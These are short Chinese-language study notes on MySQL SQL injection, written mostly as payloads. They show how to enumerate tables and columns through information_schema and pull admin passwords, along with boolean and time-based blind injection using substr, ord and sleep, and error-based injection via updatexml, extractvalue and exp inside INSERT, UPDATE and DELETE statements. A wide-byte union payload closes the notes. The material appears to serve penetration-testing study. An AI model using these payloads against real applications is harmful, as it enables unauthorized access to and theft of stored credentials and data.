MySQL注入笔记
MySQL基础知识
information_schema //MySQL自带数据表
table_schema //数据库名
table_name //表名
column_name //列名
select table_name information_schema.tables where table_schema=database(); //跑表名
select column_name from information_schema.columns where table_name='admin' //跑列名
select password from admin//跑数据
盲注
运用的一些函数
substr(version(),1,1); //从第 1 个字节开始截取 1 个字节
if(1=1,sleep(5),1); 如果 1=1 则执行 sleep(5)，否则返回 1
ord('a') //ascii 97
bool 盲注
形如 ‘=(bool)=’ ,and ‘1’=’1’ , and 1=1
admin'=(select(substr((select(passwd)from(user))from(1)for(1)))=8)='1 //
时间盲注
形如 if(1=1,sleep(5),1)
if(ord((select substr(username,{0},1) from user ))=50,sleep(3)
select table_name from information_schema.tables where table_schema=database()
select if(ord(substr((select table_name from information_schema.tables where table_schema=database()),0,1))=117,sleep(5),1);
select if(ord(substr((select username from user limit 1),1,1))=108,sleep(5),1);
insert update delete注入 引用
insert语句
insert into users (id, username, password) values (2,''injecthere'','Olivia');
insert into users (id, username, password) values (2,""injecthere"",'Olivia');
payload
or updatexml(1,concat(0x7e,(version())),0) or
insert
INSERT INTO users (id, username, password) VALUES (2,'Olivia' or updatexml(1,concat(0x7e,(version())),0) or'', 'Nervo');
update
UPDATE users SET password='Nicky' or updatexml(2,concat(0x7e,(version())),0) or''WHERE id=2 and username='Olivia';
delete
DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
报错注入(xpath,updatexml,exp)
XPATH注入
0x7e表示的是“~”符号
+and+extractvalue(rand(),concat(0x7e,version()))-- //报错回显版本号
updatexml报错注入
+and+updatexml(0x7e,concat(0x7e,(version())),0)--
exp报错注入
and EXP(~(SELECT * from(select user())a))
宽字节注入
?id=-1%df%27union%20select%201,user(),3--+